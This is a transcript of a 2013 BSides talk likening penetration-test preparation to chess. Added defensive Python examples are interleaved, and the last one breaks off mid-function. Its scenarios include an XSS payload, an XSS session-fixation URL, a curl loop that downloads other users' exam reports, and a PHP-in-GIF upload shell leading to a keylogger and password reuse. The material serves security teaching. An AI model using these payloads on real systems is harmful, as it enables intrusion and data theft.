Pentesting like a grandmaster BSides London 2013
Demos: http://www.youtube.com/playlist?list=PL3SqEmKhsxzzUIG1oIOUw3UeK0euTSTNH

Chess is a complex game: the number of permutations is just too great to compute the best possible move during a game. Pen testing is similar in that we also have too many vulnerabilities to find and choose from, not only on a one-by-one basis but also in how we would chain them together like a real attacker.
Chess players must analyse efficiently to beat time constraints, like pentesters, but unlike pentesters they have been doing this for a long time.
The purpose of this talk is to expose the techniques chess players have been using for centuries and to illustrate how we can learn from these and apply them to pen testing. The talk will be highly practical and will show how these techniques have been incorporated into OWTF, not only with screenshots but also demos.
Have you ever had to spend valuable time in the middle of a test to prepare something you could have prepared in advance? Did you ever analyse a vulnerability/attack-path in depth only to find a significantly easier to exploit vulnerability hours/days later? Pen testing is very similar to playing chess: it is easy to get carried away and waste valuable analysis time on a line of attack that is just not the best option. Maybe mistakes like this will be a bit less likely after attending this talk.
Transcript

  • 1. Pentesting like a Grandmaster
    Abraham Aranguren
    @7a_ @owtfp
    abraham.aranguren@owasp.org
    http://7-a.org
    http://owtf.org
    BSides London, 24th April 2013
  • 2. Agenda
    • Intro
    • What makes a great player/tester
    • Hacking is like Chess
    • Intelligence = 1 variable
    • Strength of Play Factors
      1. Individual Skill
      2. Game Preparation
      3. Game Performance
    • OWASP OWTF in 5 minutes
    • Pwnage and WIN scenarios
    • Conclusion
    • Q&A
  • 3. About me
    • Spanish dude
    • Uni: Degree, InfoSec research + honour mark
    • IT: Since 2000, defensive sec as netadmin / developer
    • (Offensive) InfoSec: Since 2007
    • OSCP, CISSP, GWEB, CEH, MCSE, etc.
    • WebAppSec and Dev/Architect
    • Infosec consultant, blogger, VSA, OWTF, GIAC, BeEF
  • 4. Disclaimer I
    I am..
    • NOT a grandmaster
    • NOT that smart
    • NOT a rockstar like HD Moore, etc.
    BUT using these techniques I could outperform people:
    • Smarter than me
    • With more experience than me
    • Way more skilled than me
  • 5. Disclaimer II
    Some of the people I will use for examples have done horrible/stupid/inappropriate things such as:
    • Biting off somebody's ear (Tyson)
    • Having affairs outside of marriage (Arnold, Capablanca)
    • Endorsing Scientology (Will Smith)
    • Anti-Semitism (Bobby Fischer), etc.
    This talk focuses ONLY on what it took these and other people to succeed and how we can learn from that.
    Celebrity FAIL would be a whole different talk ☺
  • 6. Hacking is like Chess
    http://imgur.com/YAnUh
  • 7. Hacking is like Chess
    http://imgur.com/YAnUh
  • 8. Hacking is like Chess
    http://imgur.com/YAnUh
  • 9. Intelligence = 1 variable
    So you watched these guys ...
    … and (maybe) you thought:
    "I am just not smart enough…"
    HD Moore, Dan Kaminsky
  • 10. How far can you get with "modest intelligence" in life?
  • 11. Success is Possible
    Success is possible for people with IQs < 160:
    • 78: Muhammad Ali: "The greatest of all time" > 80%?
    • 98: George H.W. Bush: US president > 70% people
    • 110: Dr. Karl: Science freak on Triple J > 40% people
    • 135: Arnold Schwarzenegger: Success BEAST 2% people
    • 135: Garry Kasparov: World Chess Champion 2% people
    Recommended reading:
    http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
  • 12. High IQ != Guaranteed success
    "Very high genius IQ": A motorcycle mechanic who hangs out with biker gangs and is frequently in and out of jail
    "Highest IQ in North America": A bouncer in a bar, minimum wage, lives in a tiny garage
    http://iq-test.learninginfo.org/iq07.htm
  • 13. Chess ELO vs. IQ (rough)
    Sources:
    http://www.sigmasociety.com/old/medias_qi.html
    http://www.jlevitt.dircon.co.uk/iq.htm
    http://www.ifvll.ethz.ch/people/sterne/Grabner_Stern_Neubauer_Acta_2006.pdf
    http://garthzietsman.blogspot.com/2012/03/chess-intelligence-and-winning.html
  • 14. Strength of Play Factors
  • 15. Strength of Play Factors
    Major strength of play factors:
    1. Individual Skill: Years of training, experience
    2. Game Preparation: Days/Weeks/Months, game-specific
    3. Game Performance: 1 minute - 2.5 hours
    Equal importance:
    • FAIL: Individual Skill without game preparation
    • FAIL: Game preparation without some Individual Skill
    • FAIL: Game performance without preparation or skill
    NOTE: In security testing "The Game" might be 5 days, 2 weeks, etc. but the same rules apply…
  • 16. 1. Individual Skill
  • 17. Start Early = Advantage
    Most World Chess Champions learned to play early:
    • 4 years old: Capablanca
    • 4 years old: Euwe
    • 4 years old: Karpov
    • 5 years old: Alekhine
    • 5 years old: Kasparov
    • 6 years old: Fischer
    • 8 years old: Tal
    BUT some started a bit later:
    • 12 years old: Botvinnik
    Some argued this "weakness" showed in some of his games
    Same goes for technology, programming, security, etc.:
    Starting early == More total time to learn == Advantage
  • 18. Will Smith: Talent vs. Skill
    "… talent you have naturally, skill is only developed by hours and hours and hours of beating on your craft. … where I excel is ridiculous, sickening, work ethic: While the other guy is sleeping I'm working, while the other guy is eating I'm working…"
    ".. talent is going to fail you if you are not skilled: if you don't study, if you don't work really hard and dedicate yourself to being better every single day.."
    http://www.youtube.com/watch?v=DNqQ5JAY88c
  • 19. Relentless Passion: Fischer
    "You can only get good at chess if you love the game."
    "Chess demands total concentration and a love for the game."
    "I give 98 percent of my mental energy to chess. Others give only 2 percent."
  • 20. Relentless Passion: Larry
    Larry Pesce from PaulDotCom (paraphrasing quote):
    "…I just don't stop: Since I wake up until I go to bed I am trying things out and doing research on my laptop, even beside my wife as she watches TV.."
  • 21. Rule 5: Work your butt off
    "…Leaving no stone unturned… no pain no gain … so yeah .. Partying, washing around .. Someone out there at the same time is working hard, someone is getting smarter and someone is winning, just remember that … there is absolutely no way around hard hard work"
    Arnold's 6 Rules of success: http://www.youtube.com/watch?v=Y7zntXR-VmA
  • 22. Pain is temporary: Ali
    "Pain is temporary, it may last a minute, an hour or even a year, but eventually, it will subside and something else will take its place .. At the end of pain is success: You are not going down because you feel a little pain!"
    "I'm exactly where I want to be because I realize I gotta commit my very being to this thing, I gotta breathe it, I gotta eat it, I gotta sleep it and until you get there you'll never be successful in life but once you get there I guarantee you the world is yours so work hard and you can have whatever it is you want."
    http://www.youtube.com/watch?v=7pE4m2THO_U
  • 23. Discipline
    "...People who'd want to be in my shoes they really think so because they think: wow, they'd make money they'd be rich BUT if they had to go through some of the things I had to go through I think they'd cry, sometimes is so depressive... that's what discipline is, discipline is going in and doing something that you don't wanna do but you do it like you love it..."
    http://www.youtube.com/watch?v=drmBziMus9E
  • 24. What's the difference
    "... these successful people realise that they have an allotted time to perform a given test so that they have to give it their absolute all to doing that test ...
    …these people gave it their heart and their soul, throughout every single rep, every single set, every single gym session, every single day for weeks, for months, for years, for decades to get to where they were…
    ... that they were going to break through all mental barriers to get to where they wanted to be and that is the difference between the successful people and those who are not" - Jaret Grossman
    http://www.youtube.com/watch?v=Sk56VxaeqEQ
  • 25. How to stay motivated
    http://smileyandwest.ning.com/profiles/blogs/the-subconscious-mind-re-focus
    Your subconscious will believe what you tell it!
    .. and what others tell it too! (i.e. "you will never X")
    Repeating your goals to your subconscious builds drive:
    99% of successful people do this (consciously or not)
  • 26. Stay healthy
    Dan Kaminsky and Alex Hutton, enjoying a Mojito, Brucon 2011
  • 27. Dr Layne Norton PhD: Deadlift tips
    "…staying healthy is a huge thing because if you are hurt, you can't lift, you can't get better … and consistency … you keep accumulating small improvements over time…"
    http://www.youtube.com/watch?v=IWRReBFHvAg – min ~ 1:10
  • 28. "Smart people learn from their own mistakes…
    … Really smart people learn from other people's mistakes"
  • 29. Stay healthy: Alekhine
    World Champion 1927-35 + 1937-46
    Loss of the title (1935): "Kmoch wrote that Alekhine drank no alcohol for the first half the match, but later took a glass before most games"
    http://en.wikipedia.org/wiki/Alexander_Alekhine
    Recovery of the title (1937): "Euwe lost the title to Alekhine in a rematch in 1937, also played in The Netherlands, by the lopsided margin of 15½–9½. Alekhine had given up alcohol to prepare for the rematch, although he would start drinking again later"
    http://en.wikipedia.org/wiki/Max_Euwe
  • 30. Stay healthy: Tal
    Could the youngest* (24) Chess World Champion keep his crown for more than 1 year? .. Of course! (*Kasparov's 22 was later)
    World Champion 1960–61
    "…bohemian life of chess playing, heavy drinking and chain smoking.. his health suffered … spent much time in hospital .. remove a kidney in 1969… briefly addicted to morphine due to intense pain … On May 28, 1992, dying from kidney failure, left hospital to play at the Moscow blitz tournament, where he defeated Garry Kasparov"
    http://en.wikipedia.org/wiki/Mikhail_Tal
  • 31. Stay healthy: Fischer
    World Champion 1972-75
    "Before and during the match, Fischer paid special attention to his physical training and fitness, which was a relatively novel approach for top chess players at that time. He had developed his tennis skills to a good level, and played frequently … and swam for extended periods, usually late at night…"
    http://en.wikipedia.org/wiki/Bobby_fischer
    "Your body has to be in top condition. Your chess deteriorates as your body does. You can't separate body from mind." – Bobby Fischer
  • 32. Stay healthy: Kasparov
    World Champion 1985–2000
    "Every morning, he ran barefoot for two and a half miles along the beach, and afterward he swam just beyond the breaking surf or played tennis on a court nestled in the woods behind the house.. After lunch and a nap, he spent five or six hours at the chessboard…"
    http://www.nytimes.com/1990/10/07/magazine/king-kasparov.html
  • 33. Practical Tips
    "Just" (!) don't stop:
    • Find things that motivate YOU and listen, etc. to that: Search youtube for "motivation", get mp3 from video, etc.
    • Read a lot: papers, presentations, PoCs, etc.
    • Watch a lot: Webinars, Talks, demos
    • Practice a lot: Focus on what interests/motivates you
    • Listen a lot: InfoSec podcasts
    Podcasts are awesome to keep learning while you do your non-intellectual activities such as: Cooking, cleaning, tidying-up, driving, etc.
    If you are a podcaster: Minimise the fillers or you'll lose your audience (skipping is annoying + impractical while driving, etc.)
  • 34. Don't Fry your CNS
    If you work hard be careful you don't fry your CNS: Your central nervous system (CNS) has finite recovery ability
    You know you've fried your CNS when:
    • You (surprisingly) get sick
    • Your mental/physical performance drops
    • Caffeine doesn't work
    • You feel like you need to sleep all day: tiredness, etc.
    If this happens you need to:
    • Sleep without alarms for 10 days (try 1 x week after fix)
    • Clean up your diet + Exercise
    • Caffeine: Avoid it or cycle it
      Cycle caffeine on and off: Use "on" days and "off" days
      Use caffeine early in the day: Clear it fully before sleep!
  • 35. Suggested watching
    Awesome talk explaining what it takes to build up individual skill:
    Haroon Meer - You and Your Research
    http://www.youtube.com/watch?v=JoVx_-bM8Tg
    Also worth a look:
    http://www.slideshare.net/reidhoffman/startup-of-you-visual-summary
  • 36. 2. Game Preparation
    Can happen:
    1) Before the game / pentest:
       Goals:
       • Scope better
       • Do better
    2) During a tournament / pentest:
       Goals:
       • React to the unexpected
       • Avoid detection
       • Prepare an attack
  • 37. Chess Player approach
    Chess players:
    • Memorise openings
    • Memorise endings
    • Memorise entire lines of attack/defence
    • Try hard to analyse games efficiently
    Pen tester translation:
    • Chess players precompute all they can
    • Chess players analyse info only once
    Chess player prep (simplified ☺):
    1. Find + prep exploits for opponent weaknesses
    2. Precompute an obscure opening: best replies analysed at home for weeks/months
    3. Kick the opponent out of precomputation with it
  • 38. Alekhine vs Capablanca
    World Championship Match 1927
  • 39. Alekhine vs Capablanca
    World Championship Match 1927
    ".. Alekhine's victory surprised almost the entire chess world. Capablanca entered the match with no technical or physical preparation, while Alekhine got himself into good physical condition, and had thoroughly studied Capablanca's play. According to Kasparov, Alekhine's research uncovered many small inaccuracies. Luděk Pachman suggested that Capablanca, who was unaccustomed to losing games or to any other type of setback, became depressed over his unnecessary loss of the eleventh game.."
    http://en.wikipedia.org/wiki/Jos%C3%A9_Ra%C3%BAl_Capablanca
    Physical Prep + Opponent Research + Mental toughness = WIN
  • 40. Garry Kasparov vs Nigel Short
    World Championship Match 1993
  • 41. Match Context
    July 1993 FIDE (ELO) rating list. Top 10 players
     1 Kasparov, Gary .................... RUS 2815 (stronger)
     2 Karpov, Anatoly ................... RUS 2760
     …
    10 Short, Nigel ...................... ENG 2665 (weaker)
    http://chess.eusa.ed.ac.uk/Chess/Trivia/AlltimeList.html
    "In 1993 Nigel Short played Garry Kasparov .. Nigel Short had won matches against former world champion Anatoly Karpov and Jan Timman on his way to meeting Kasparov."
    http://www.supreme-chess.com/famous-chess-players/nigel-short.html
  • 42. Nigel Short's Prep surprises Kasparov
    "Kasparov was evidently disoriented as he used 1 hour 29 minutes to Short's 11 minutes(!) for the entire game."
    Short (weaker) was 8 times faster
    http://www.chessgames.com/perl/chessgame?gid=1070677
  • 43. Kasparov + team strike back
    "In just (!) 9 days after facing it for the first time … Kasparov and his team had found the best reply (11.Ne2) and even succeeded in completely bamboozling Short with 12.Be5"
    "This move was a surprise for me. I spent 45 minutes on my reply. I could not fathom out the complications … " – Nigel Short
    http://www.chessgames.com/perl/chessgame?gid=1070681
  • 44. Anti-Chess Prep: Random Chess
    Fischer complained … that because of the progress in openings and the memorization of opening books, the best players from history, if brought back from the dead to play today, would no longer be competitive.
    "Some kid of fourteen today, or even younger, could get an opening advantage against Capablanca"
    http://en.wikipedia.org/wiki/Bobby_fischer#Fischer_Random_Chess
  • 45. Pwn2Own: Headlines vs. Prep
    Headline: "Apple's Leopard hacked in 30 seconds"
    http://www.zdnet.com/apples-leopard-hacked-in-30-seconds-1339287733/
    Reality: Charlie Miller on his own prep (2008):
    "… It took us a couple of days to find something, then the rest of the week to work up an exploit and test it. It took us maybe a week altogether"
    http://www.roughlydrafted.com/2008/03/29/mac-shot-first-10-reasons-why-cansecwest-targets-apple/
    Bottom line: 1 week of prep for a 30 second attack
  • 46. Pwn2Own: Stephen Fewer's prep
    "Fewer says that the successful exploit required use of three separate vulnerabilities:
    • Two to achieve successful code execution within the browser
    • and then a third to escape Internet Explorer's Protected Mode sandbox.
    Putting together the successful attack took Fewer five to six weeks."
    http://arstechnica.com/security/2011/03/pwn2own-day-one-safari-ie8-fall-chrome-unchallenged/
  • 47. Chris Nickerson on Prep
    ".. If you do the proper intelligence gathering you can plan an attack that will work and I say that because you will NOT get stopped: … if you get stopped, it is your fault for not doing enough intelligence gathering so remember it next time"
    http://blog.securityactive.co.uk/2009/10/19/chris-nickerson-red-and-tiger-team-testing-brucon-2009/ - min ~16
  • 48. Kevin Mitnick's Prep
    ".. we can setup their environment in our lab, and … we can… exploit our own environment … this was doing a lot of work prior to the attack: Finding out the AV, finding out the target system and working on bypassing UAC before the client was even hit … And then when we did the attack it worked flawlessly the first time … I think the upfront preparation is really critical to be successful in this stuff"
    http://vimeo.com/31663242 - minutes: ~19 + 32:48
  • 49. OSCP results from 2008
    24h hacking challenge: Nessus, etc. forbidden, scripts ok.
    Strength of Play  | Matteo Memelli (ryujin) | Me (1st try)                      | 2 x respected Security Pros
    Individual Skill  | 7? (12 in 2013)         | < 1 year (weak!)                  | 5-10 years?
    Game prep         |                         | 1-1,5 months (with a day job)     | 0? (maybe only studying?)
    Game performance  | 100%                    | 100% WTF?                         | FAIL WTF? (less than me?)
    Time              | 9-10 hours (test)       | 19 hours (test) + 5 hours (sleep) | 24 hours
    Matteo was x2 faster, but you can't get more than 100% ☺
    Game prep was critical to outperform stronger test takers
  • 50. My Strategy: Serious prep
    Knowing myself (Pre-prep self-feelings at the time)
    • Strength: Coding (dev background = edge over net guys)
    • Top Likely Weakness: Time (weaker = slower)
    Knowing the "enemy" (The 24 hour hacking challenge)
    • Tough test: Most people failed (based on IRC)
    • Scripts allowed, Nessus, etc. forbidden
    • Watch purehate's videos, for ideas, etc.: really helpful
    Battle prep plan
    • Heavy Scripting: Reduce time for uncreative work
    • Heavy Practice: Necessary to be faster on more creative/harder to automate work (exploitation, escalation, etc.). All exercises, extra miles, etc.
    • Podcast Abuse: 3 years of PaulDotCom in 1 month!
  • 51. Script 1: Prober
    Probe more likely open ports first until a full scan completes:
    • 1st wave: scan + probe top 100 TCP ports + SNMP (awesome) results in 5 minutes!
    • 2nd wave: scan + probe next 900 TCP ports + few UDP
    • 3rd wave: scan remaining TCP ports (slower)
    • 4th wave: scan remaining UDP ports (super-slow)
    • For each wave: Group report 1 thing to look at
    Summary:
    • Staged: Fast results (5-10 minutes for 1st wave)
    • Reliable: Even monitored free RAM, etc. before launching things (to avoid crashing my own machine!)
    • Auto-Pilot: No supervision required (!babysitting)
  • 52. Script 2: Reporter
    A separate script generated partial reports at any time: I could see the partial probing results and work from there very quickly through a clickable web page.
    No waiting until all the probes finished (critical).
  • 53. The Advantage of organised info
    Others spent valuable energy to run (a lot of) tools by hand (12+ terminals open to babysit, etc.)…
    … I had this in < 10 minutes via scripts!:
  • 54. When Prep FAILs
    Whatever you do, prep will fail sooner or later
    Option 1) Take the hit: Consider nights, weekends, etc. This will pay off in the test and your future assessments; view it as a "paid training opportunity"
    Option 2) Ask for an extension: Find a good reason + Negotiate an extension with your customer
    Option 3) Ask for a delay: Take the hit without disrupting your life that much (maybe ☺)
    Option 4) All of the above ☺
  • 55. 3. Game Performance
  • 56. http://www.securitygeneration.com/security/pic-of-the-week-real-world-penetration-testing/
  • 57. http://www.slideshare.net/bsideslondon/breaking-entering-and-pentesting
  • 58. Mental Toughness: Karpov
    Karpov: World Champion 1975–85
    "… I could resist in positions where other players probably would resign. And I was finding interesting ideas on how to defend difficult positions and I could save many games. .. I never gave up… you try to find the best move whatever the position is, because many people they say, okay, this is bad and then they lose will to fight. I never lost the will to fight."
    http://bigthink.com/videos/the-value-of-mental-toughness
  • 59. Efficient Chess Analysis
    From Alexander Kotov - "Think like a Grandmaster":
    1) Draw a list of candidate moves (3-4): 1st Sweep (!deep)
    2) Analyse each variation only once (!): 2nd Sweep (deep)
    3) After step 1 and 2 make a move
    Pen tester translation:
    1) Draw up a list of candidate paths of attack
    2) Analyse [ tool output + other info ] once and only once
    3) After 1) and 2) exploit the best path of attack
    Ever analysed X in depth to only see "super-Y" later?
  • 60. In 5 minutes
    Putting it all together:
  • 61. Plugin Types (-t)
    At least 50% (32 out of 64) of the tests in the OWASP Testing Guide can be legally* performed at least partially without permission
    * Except in Spain, where visiting a page can be illegal ☺
    * This is only my interpretation and not that of my employer + might not apply to your country!
  • 62. A Pentester "cheating try"
    Offensive (Web) Testing Framework = Multi-level "cheating" tactics
  • 63. OWTF's Chess-like approach
    Kasparov against Deep Blue - http://www.robotikka.com
  • 64. Scenario 1: Summary
    Pre-Engagement: No permission to test (Game prep)
    1) Run passive plugins: legit + no traffic to target
       Sitefinity CMS found
    2) Identify best path of attack:
       • Sitefinity default admin password
       • Public Sitefinity shell upload exploits
    Engagement: Permission to test (Game performance)
    1) Try best path of attack first
  • 65. Scenario 1: Demo
  • 66. Scenario 1: Outcome!!
    1 minute after getting permission …
  • 67. Scenario 1: Outcome!!
    5 minutes after getting permission …
  • 68. Scenario 2: Summary
    Attack preparation (pre-engagement safe) (Game prep)
    1) Run semi-passive plugins: legit
       Misconfigured crossdomain, fingerprint wordpress version
    2) Identify best path of attack:
       crossdomain + phishing + wordpress plugin upload + meterpreter
    3) Replicate customer environment in lab
    4) Prep attack: Adapt public payloads to target
    5) Test in lab
    Launching the attack (Game performance)
    1) Tested attack works flawlessly on the first shot
    2) Pivot
    3) Show impact
  • 69. Scenario 2: Demo
  • 70. Scenario 3: Summary
    Pre-Engagement: No permission to test (Game prep)
    1) Mapping the application you notice….. https://target.com/reports/rwservlet/
       Auth bypass vuln by design: Oracle Reports accessible without auth
    2) Identify best path of attack: Use the reporting GUI ☺
    Engagement: Permission to test (Game performance)
    1) Pwn customer on "minute 1": Use the reporting GUI ☺
  • 71. Scenario 3: Impact
  • 72. Scenario 3: Impact
  • 73. Scenario 3: Vuln Examples ☺
  • 74. Scenario 4: Summary
    Pre-Engagement: No permission to test (Game prep)
    1) .NET app: OMG they have a firewall ☺
    2) Hmm they also have an XML file upload!
    3) Identify best path of attack: XSS via encoded field in XML file upload
       &lt;iframe onload=&quot;javascript:ALERT(OWNED)&quot; src=&quot;http://www.google.com&quot;&gt;&lt;/iframe&gt;
    Engagement: Permission to test (Game performance)
    1) Pwn customer on "minute 1": Persistent XSS via XML upload
  • 75. Scenario 4: PoC
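Why the entity-encoded field in Scenario 4 still fires is worth seeing in code: the XML parser decodes `&lt;` and `&quot;` on the way in, so the application receives a raw tag and only an escape at the point of HTML output keeps it inert. This is an added example (not code from the talk, OWTF or the target application); the sample upload bytes are constructed and the field name `name` is assumed.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed sample upload (not from the talk): one field carries HTML markup
# that was entity-encoded so it looks harmless inside the XML file.
SAMPLE_UPLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<record>
  <name>&lt;iframe onload=&quot;alert(1)&quot; src=&quot;http://example.invalid&quot;&gt;&lt;/iframe&gt;</name>
</record>"""

MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")  # start of an opening or closing tag


def parse_name(xml_bytes: bytes) -> str:
    """Parse the upload and return the <name> field as the application sees it.

    The XML parser decodes &lt; &gt; &quot; on the way in, so the value handed
    to the application is a raw HTML tag, not the encoded text in the file.
    (For untrusted XML in production, parse with defusedxml to also shut off
    entity expansion and external entities; ElementTree is used here to keep
    the example standard-library only.)
    """
    root = ET.fromstring(xml_bytes)
    return root.findtext("name") or ""


def render_unsafe(xml_bytes: bytes) -> str:
    """The bug: the decoded field is interpolated into HTML as-is."""
    return f"<p>Name: {parse_name(xml_bytes)}</p>"


def render_safe(xml_bytes: bytes) -> str:
    """The fix: escape on output, at the point where text meets HTML."""
    return f"<p>Name: {html.escape(parse_name(xml_bytes), quote=True)}</p>"


def contains_markup(value: str) -> bool:
    """Defence in depth for an upload validator: flag fields that decode to
    something tag-shaped, so the file can be rejected or reviewed before it is
    stored, instead of relying on output escaping alone."""
    return MARKUP_RE.search(value) is not None
```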
  • 76. Scenario 5: Summary
    Pre-Engagement: No permission to test (Game prep)
    1) File upload check: Can upload doc files
    2) Noting URL: http://target.com/attachments/..........._test.doc
    3) Log out
    4) Try to get uploaded file: Success: Auth bypass
    5) Prepare attack: Write script to download all documents
    Engagement: Permission to test (Game performance)
    1) Pwn customer on "minute 1": Run script
  • 77. Scenario 6: Summary
    1) Session Id does not change after login
    2) Got XSS
    3) Prepping XSS + Session fixation exploit:
       https://target.com/sample.php?Code=><script>document.cookie='PHPSESSID=3ssc1h5464qonvhuq3gm5u49q6;path=/'; window.location='https://target.com/login/';</script><br
    Bottom line: Session fixation through XSS is possible
  • 78. Scenario 7: Summary
    1) Site A makes a request to Site B with NO security tokens
    2) Site A retrieves sensitive info from Site B using 1)
    3) Problem verification:
       curl --referer https://target.com/demo.php "http://target2.com/demo.jsp?userid=xxxxxxx&examid=xxxxxxxx" | lynx --dump -stdin | more
    Quick Exploit: Downloads arbitrary exam reports..
       for i in $(php -r 'echo implode(" ", range(11200,16000));'); do
         echo "Trying $i .."; curl … > tmp.html ;
         BAD=$(grep '500 - Internal server error' tmp.html | wc -l);
         if [ $BAD -eq 0 ]; then
           cp tmp.html $i.html; # Got a hit
         fi
       done
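What a defender takes from Scenario 7, as an added example that is not code from the talk: the detection side parses a few constructed access-log lines for the sequential examid walk that a counter loop like the one above leaves behind, and the authorization side shows the check Site B should make (does the session user own this report?) instead of trusting the Referer header. The log lines, IP addresses and the ownership table are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/Nginx "combined" log format; the referer field is captured because the
# endpoint in the slide treated it as its only authorization signal.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
EXAMID_RE = re.compile(r"[?&]examid=(\d+)")

# Constructed sample log (not real traffic): one client walks examid values
# 11200..11205 within seconds; the 500s are ids that do not exist.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2013:10:00:01 +0000] "GET /demo.jsp?userid=4242&examid=11200 HTTP/1.1" 500 310 "https://target.com/demo.php" "curl/7.29"
203.0.113.7 - - [24/Apr/2013:10:00:02 +0000] "GET /demo.jsp?userid=4242&examid=11201 HTTP/1.1" 200 8120 "https://target.com/demo.php" "curl/7.29"
203.0.113.7 - - [24/Apr/2013:10:00:02 +0000] "GET /demo.jsp?userid=4242&examid=11202 HTTP/1.1" 500 310 "https://target.com/demo.php" "curl/7.29"
203.0.113.7 - - [24/Apr/2013:10:00:03 +0000] "GET /demo.jsp?userid=4242&examid=11203 HTTP/1.1" 200 7933 "https://target.com/demo.php" "curl/7.29"
203.0.113.7 - - [24/Apr/2013:10:00:04 +0000] "GET /demo.jsp?userid=4242&examid=11204 HTTP/1.1" 500 310 "https://target.com/demo.php" "curl/7.29"
203.0.113.7 - - [24/Apr/2013:10:00:04 +0000] "GET /demo.jsp?userid=4242&examid=11205 HTTP/1.1" 200 8077 "https://target.com/demo.php" "curl/7.29"
198.51.100.5 - - [24/Apr/2013:10:00:05 +0000] "GET /demo.jsp?userid=1337&examid=15877 HTTP/1.1" 200 8002 "https://target.com/demo.php" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    idm = EXAMID_RE.search(rec["path"])
    rec["examid"] = int(idm.group(1)) if idm else None
    return rec


def detect_enumeration(log_text, min_distinct=5, window_seconds=60, max_gap=1):
    """Flag clients that fetch >= min_distinct distinct examid values within
    window_seconds where every sorted id is at most max_gap from the previous
    one: the signature of a counter loop rather than a user clicking around.
    The window is measured over all of a client's requests in the text; a
    sliding window is left out to keep the example short."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["examid"] is not None:
            by_ip[rec["ip"]].append(rec)
    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        ids = sorted({r["examid"] for r in recs})
        span = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds()
        if len(ids) < min_distinct or span > window_seconds:
            continue
        if max(b - a for a, b in zip(ids, ids[1:])) > max_gap:
            continue
        errors = sum(1 for r in recs if r["status"] >= 500)
        findings.append({
            "ip": ip,
            "distinct_ids": len(ids),
            "first_id": ids[0],
            "last_id": ids[-1],
            "error_ratio": round(errors / len(recs), 2),  # misses in the id space
        })
    return findings


# Constructed ownership table standing in for the database lookup Site B should
# perform: which authenticated user each exam report belongs to.
REPORT_OWNER = {11201: 4242, 11203: 4242, 11205: 9999, 15877: 1337}


def authorize_report(session_userid, examid, referer=None):
    """Server-side check for Site B: the report must belong to the user bound
    to the session. The Referer header is accepted as a parameter only to make
    the point that it is ignored; it is client-controlled and proves nothing."""
    return REPORT_OWNER.get(examid) == session_userid
```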
  • 79. Scenario 8: AppSec2NetSec
    1) Initial scope: 1 app server on cloud provider
    2) File Upload vuln
    3) Getting a nice shell
    4) Run keylogger
    5) Mapped hosts
    6) Reused passwords
    7) Pwned 17 servers (GUI access on 16)
    8) No admin detected the attack ☺
  • 80. Scenario 8: AppSec2NetSec
    2) Classic File upload, Null character and shell
    Small gotcha: Image had to be valid so I used a GIF file with PHP code in the comment (using GIMP)
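The upload-side check that would have caught this slide's technique, as an added example (not code from the talk or from OWTF): it rejects NUL bytes in the filename, allow-lists the extension, walks the GIF block structure to find script markers hidden in comment blocks, and can rebuild the file without those blocks. The GIF builder and every sample byte here are constructed for the demonstration.

```python
# Constructed sample GIF bytes plus a block-level parser; added example code,
# not the uploader or the image from the talk.

SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def _sub_blocks(payload):
    """Encode payload as GIF data sub-blocks (<=255 bytes each, 0x00 ends)."""
    out = bytearray()
    for i in range(0, len(payload), 255):
        chunk = payload[i:i + 255]
        out += bytes([len(chunk)]) + chunk
    return bytes(out) + b"\x00"


def build_gif(comment=None):
    """Constructed 1x1 GIF89a: no colour table, placeholder image data, and an
    optional Comment Extension (0x21 0xFE) of the kind GIMP writes."""
    g = bytearray(b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00")
    if comment is not None:
        g += b"\x21\xFE" + _sub_blocks(comment)
    g += b"\x2C" + b"\x00" * 9                # image descriptor, no local table
    g += b"\x02" + _sub_blocks(b"\x44\x01")   # LZW min code size + placeholder data
    return bytes(g) + b"\x3B"                 # trailer


def _read_sub_blocks(data, pos):
    out = bytearray()
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        out += data[pos:pos + n]
        pos += n


def _header_len(data):
    """Length of header + logical screen descriptor + global colour table."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    gct = 3 * (2 ** ((packed & 0x07) + 1)) if packed & 0x80 else 0
    return 13 + gct


def gif_blocks(data):
    """Yield (kind, payload, raw) for every top-level block, so a comment tucked
    between image blocks is seen rather than skipped over."""
    pos = _header_len(data)
    while True:
        start = pos
        tag = data[pos]
        if tag == 0x3B:                       # trailer
            return
        if tag == 0x21:                       # extension: label, then sub-blocks
            label = data[pos + 1]
            payload, pos = _read_sub_blocks(data, pos + 2)
            kind = "comment" if label == 0xFE else f"ext_{label:02x}"
        elif tag == 0x2C:                     # image descriptor
            pk = data[pos + 9]
            pos += 10
            if pk & 0x80:                     # local colour table present
                pos += 3 * (2 ** ((pk & 0x07) + 1))
            pos += 1                          # LZW minimum code size
            payload, pos = _read_sub_blocks(data, pos)
            kind = "image"
        else:
            raise ValueError(f"unexpected block 0x{tag:02x} at {start}")
        yield kind, payload, data[start:pos]


def check_upload(filename, data, allowed=("gif",)):
    """Return (ok, reason); each check maps to one trick on the slide."""
    if "\x00" in filename:
        return False, "NUL byte in filename"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in allowed:
        return False, f"extension {ext!r} not allowed"
    try:
        for kind, payload, _ in gif_blocks(data):
            if kind != "image" and any(m in payload.lower() for m in SCRIPT_MARKERS):
                return False, f"script marker in GIF {kind} block"
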